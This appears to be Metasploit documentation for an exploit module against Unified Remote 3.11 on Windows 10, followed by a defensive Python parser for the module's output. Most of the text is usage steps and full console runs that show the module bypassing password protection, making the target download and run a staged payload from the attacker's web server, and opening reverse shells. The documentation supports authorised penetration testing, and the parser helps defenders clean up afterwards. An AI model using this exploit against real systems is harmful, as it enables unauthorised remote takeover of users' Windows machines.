## Vulnerable Application

This module utilizes the Unified Remote remote control protocol to type out and deploy a payload. The remote control protocol can be configured to have no password, a group password, or individual user accounts. If the web page is accessible, the access control is set to no password for exploitation, then reverted. If the web page is not accessible, exploitation will be tried blindly.

This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.

There are two methods to run a payload:

1. Push method. This method pushes the payload (as if you were typing it) to the prompt. If you have a very small payload, or are just running a simple command, this would be fine. However, since we are running a binary payload which has been base64 encoded, this method usually took minutes to complete. Since Windows needs to be unlocked, the assumption is that a user is there, and watching a payload be typed on the screen for minutes seemed unacceptable. Also, if the user clicks the mouse or hits a key on the keyboard, the payload will not finish or will be corrupted. This method was pulled from the final module as it didn't seem likely to succeed and was not feasible outside of a testing environment.
2. Pull method. This method starts a web server on the Metasploit host, and types out the command to pull and execute the payload. Since the URL is typically short, this method proved to be reliable and quick.

Version 3.11.0.2483 can be downloaded from unifiedremote.com
## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/unified_remote_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell.
## Options

### WEBSERVER

The port the web server is running on. Defaults to `9510`.

### CLIENTNAME

The name of the client device to use. This shows up in the Unified Remote logs. If empty, a random Android-based name is chosen. Defaults to an empty string.

### SLEEP

The length of time to sleep between each command; this gives the remote program time to process the command on screen. Defaults to `1` second.

### PATH

Where to temporarily store the payload. Defaults to `c:\\Windows\\Temp\\`.

### VISIBLE

If set to `true`, uses a 'standard' method of typing to the screen. If set to `false`, utilizes a 'pro' feature of Unified Remote to execute a script in the background. Defaults to `false`.
## Scenarios

### Version 3.11.0.2483 on Windows 10, No authentication, visible false

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > run
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-ASvxWyO708Rv4x0j
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Loading Unified.Command
[*] 2.2.2.2:9512 - Updating Unified.Command
[*] 2.2.2.2:9512 - Sending payload
[*] 2.2.2.2:9512 - Executing script
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50052) at 2022-09-18 19:00:33 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\U4culUYTuG.exe' on the target
Shell Banner:
C:\ProgramData\Unified Remote\Remotes\Bundled\Unified\Main\Command>
```
### Version 3.11.0.2483 on Windows 10, No authentication, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-s5IbpVuRf1MJzqRs
[*] 2.2.2.2:9512 - Retrieving server config
[+] 2.2.2.2:9512 - No security enabled
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59233) at 2022-09-08 16:47:20 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\jhy5cTqRs.exe' on the target
Shell Banner:
C:\Users\windows>whoami
whoami
win10prolicense\windows
C:\Users\windows>systeminfo
systeminfo
Host Name: WIN10PROLICENSE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.16299 N/A Build 16299
```
### Version 3.11.0.2483 on Windows 10, group authentication, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
Shell Banner:
C:\Users\windows>
```
### Version 3.11.0.2483 on Windows 10, user authentication, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-Mmw9X2FSLLPzJk6t
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - users mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] 2.2.2.2:9512 - Sleeping 5 seconds for server to restart
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59932) at 2022-09-08 16:53:05 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\2NzuxPbY6fGK9FdNy.exe' on the target
Shell Banner:
C:\Users\windows>
```
### Version 3.11.0.2483 on Windows 10, no authentication, no web server access, visible true

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-EIC1Bc3pwL4U4Pnj
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[+] 2.2.2.2:9512 - Payload request received, sending 73802 bytes of payload for staging
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 2.2.2.2
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:60829) at 2022-09-08 17:00:30 -0400
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\QD7V9rLaWUwvPIY.exe' on the target
Shell Banner:
C:\Users\windows>
```
### Version 3.11.0.2483 on Windows 10, user authentication, no web server access, visible true

This will fail.

```
resource (unified.rb)> use exploits/windows/misc/unified_remote_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (unified.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (unified.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (unified.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/unified_remote_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
[*] 2.2.2.2:9512 - Retrieving server config
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Sending handshake
[*] 2.2.2.2:9512 - Sending empty authentication
[*] 2.2.2.2:9512 - Opening Start Menu
[*] 2.2.2.2:9512 - Opening command prompt
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Attempting to open payload
[*] 2.2.2.2:9512 - Server stopped.
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
[*] Exploit completed, but no session was created.
```
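The verbose output in the scenarios above records everything a defender needs to reconcile after an authorised test of this module: the payload staging URL the target was made to fetch from, the dropped `.exe` under the PATH directory that the module warns needs manual cleanup, whether the server's password mode was switched off and whether the revert step ran, and the peer of any session that came back. The following is an added example, not code from the module or from Metasploit: a small parser for that output. The message strings it matches are taken verbatim from the scenarios on this page; it assumes nothing about other output formats, and the two embedded runs are constructed (trimmed) copies of the group-authentication and failing no-web-access scenarios.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed samples, trimmed from the verbose output shown in the scenarios:
# one run where a group password was bypassed and reverted and a session came
# back, and one where the web interface was unreachable and no session opened.
SAMPLE_SUCCESS = r"""
[*] 2.2.2.2:9512 - Client name set to: android-ergZhp49nDBmGXz8
[*] 2.2.2.2:9512 - Retrieving server config
[*] 2.2.2.2:9512 - anonymous mode enabled, password required, bypassing
[*] 2.2.2.2:9512 - Uploading new server config
[+] 2.2.2.2:9512 - Found account: admin
[+] 2.2.2.2:9512 - Found account: wheres
[*] 2.2.2.2:9512 - Typing out payload
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[*] 2.2.2.2:9512 - Reverting security mode
[*] 2.2.2.2:9512 - Uploading new server config
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:59596) at 2022-09-08 16:50:21 -0400
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\lqVUQTKtxuSD1mm.exe' on the target
"""

SAMPLE_FAILED = r"""
[*] 2.2.2.2:9512 - Client name set to: android-iJP3rW13dKjtf8Xz
[-] 2.2.2.2:9512 - Web interface is disabled. Unable to attempt bypass, assuming no authentication.
[*] 2.2.2.2:9512 - Using URL: http://1.1.1.1:8080/
[!] 2.2.2.2:9512 - This exploit may require manual cleanup of 'c:\Windows\Temp\tapEZnGskY.exe' on the target
[*] Exploit completed, but no session was created.
"""


@dataclass
class RunSummary:
    target: Optional[str] = None        # host:port of the Unified Remote service
    client_name: Optional[str] = None   # CLIENTNAME as it appears in the server's logs
    auth_mode: str = "unknown"          # "none", "anonymous" (group), "users" or "unknown"
    auth_bypassed: bool = False         # module uploaded a config with the password disabled
    auth_reverted: bool = False         # module restored the original security mode
    payload_url: Optional[str] = None   # URL the target was typed to fetch from
    dropped_file: Optional[str] = None  # file the module says needs manual cleanup
    accounts: List[str] = field(default_factory=list)
    session_opened: bool = False
    handler: Optional[str] = None       # ip:port of the listener (attacker side)
    session_peer: Optional[str] = None  # ip:port of the target side of the shell


# Patterns built from the exact strings the module prints in the scenarios.
RE_TARGET = re.compile(r"^\[[*+!-]\] (\S+:\d+) - ")
RE_CLIENT = re.compile(r"Client name set to: (\S+)")
RE_MODE = re.compile(r"(anonymous|users) mode enabled, password required, bypassing")
RE_NOSEC = re.compile(r"No security enabled")
RE_WEBDOWN = re.compile(r"Web interface is disabled")
RE_REVERT = re.compile(r"Reverting security mode")
RE_ACCOUNT = re.compile(r"Found account: (\S+)")
RE_URL = re.compile(r"Using URL: (\S+)")
RE_CLEANUP = re.compile(r"manual cleanup of '([^']+)'")
RE_SESSION = re.compile(r"session \d+ opened \((\S+) -> (\S+)\)")


def summarize(output: str) -> RunSummary:
    """Walk the module's verbose output line by line and collect the facts above."""
    s = RunSummary()
    for line in output.splitlines():
        if not line.strip():
            continue
        if s.target is None and (m := RE_TARGET.match(line)):
            s.target = m.group(1)
        if m := RE_CLIENT.search(line):
            s.client_name = m.group(1)
        elif m := RE_MODE.search(line):
            s.auth_mode, s.auth_bypassed = m.group(1), True
        elif RE_NOSEC.search(line):
            s.auth_mode = "none"
        elif RE_WEBDOWN.search(line):
            s.auth_mode = "unknown"   # module could not read the config, so neither can we
        elif RE_REVERT.search(line):
            s.auth_reverted = True
        elif m := RE_ACCOUNT.search(line):
            s.accounts.append(m.group(1))
        elif m := RE_URL.search(line):
            s.payload_url = m.group(1)
        elif m := RE_CLEANUP.search(line):
            s.dropped_file = m.group(1)
        elif m := RE_SESSION.search(line):
            s.session_opened, s.handler, s.session_peer = True, m.group(1), m.group(2)
    return s


def config_left_open(s: RunSummary) -> bool:
    """True when the password was disabled but the run never reached the revert
    step (e.g. it was interrupted), so the service still accepts empty auth."""
    return s.auth_bypassed and not s.auth_reverted


def indicators(s: RunSummary) -> List[str]:
    """Host and network artefacts to reconcile on the target after the run."""
    found = []
    if s.dropped_file:
        found.append(f"file on target: {s.dropped_file}")
    if s.payload_url:
        found.append(f"outbound HTTP fetch from target to {s.payload_url}")
    if s.session_opened:
        found.append(f"reverse shell from {s.session_peer} to {s.handler}")
    if s.client_name:
        found.append(f"client name in Unified Remote logs: {s.client_name}")
    if config_left_open(s):
        found.append("server config still has the password disabled; restore it")
    return found


if __name__ == "__main__":
    for name, sample in (("success", SAMPLE_SUCCESS), ("failed", SAMPLE_FAILED)):
        print(name, *indicators(summarize(sample)), sep="\n  ")
```

The `config_left_open` check is the one worth keeping even if the rest is discarded: the page's bypass path uploads a no-password config and only restores it after the payload has been fetched, so a run that dies between "Uploading new server config" and "Reverting security mode" leaves the service open to anyone on the network until the config is fixed by hand.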